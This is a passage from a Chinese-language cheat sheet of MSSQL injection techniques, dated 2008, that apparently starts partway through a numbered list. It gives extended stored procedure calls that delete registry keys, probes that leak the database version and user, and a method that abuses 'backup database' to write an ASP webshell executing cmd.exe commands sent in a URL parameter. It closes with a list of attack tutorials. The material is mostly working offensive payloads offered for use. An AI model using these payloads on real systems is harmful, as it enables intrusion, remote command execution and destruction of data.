SQL注入技巧资料大全
2008-10-27 16:51:24 来源:WEB开发网execxp_regdeletevalue'HKEY_LOCAL_MACHINE',
'SOFTWAREMicrosoftWindowsCurrentVersion',
'TestValueName'删除某个值
xp_regdeletekey'HKEY_LOCAL_MACHINE',
'SOFTWAREMicrosoftWindowsCurrentVersionTestkey'删除键,包括该键下所有值
14.mssql的backup创建webshell
usemodel
createtablecmd(strimage);
insertintocmd(str)values('<%DimoScript%>');
backupdatabasemodeltodisk='c:l.asp';
15.mssql内置函数
;and(select@@version)>0获得Windows的版本号
;anduser_name()='dbo'判断当前系统的连接用户是不是sa
;and(selectuser_name())>0爆当前系统的连接用户
;and(selectdb_name())>0得到当前连接的数据库
16.简洁的webshell
usemodel
createtablecmd(strimage);
insertintocmd(str)values('<%=server.createobject("wscript.shell").exec("cmd.exe/c"&request("c")).stdout.readall%>');
backupdatabasemodeltodisk='g:wwwtestl.asp';
请求的时候,像这样子用:
http://ip/l.asp?c=dir
参考资料(自己GOOGLE)
SQL注入天书-ASP注入漏洞全接触(小竹)
MSSQL跨库查询(臭要饭的!黑夜)
榨干MSSQL最后一滴血
SQL语句参考及记录集对象详解
关于SQLServer中存储过程
利用mssqlbackup创建webshell
SQL_Injection高级应用
跨站式SQL注入(老凯(laokai))
怪异的SQL注入(AMANL)
SQLServer应用程序中的高级SQL注入(翻译:青野志狼)
如何利用Sql注入遍历目录(sinkaQQ:20355)
SQLInjection技巧的演练(翻译人:demonalex)
SQL数据库的一些攻击
SQLInjection攻击技术(JSW)
SQL_Injection高级应用(apachy)
SQL注入的不常见方法(桂林老兵)
Backupashell
谈php+mysql注射语句构造(黑嘿黑·≯Super·Hei)
AdvancedSQLInjectionwithMySQL(angel)
L'injection(My)SQLviaPHP
OracleSQL语言
更多精彩
赞助商链接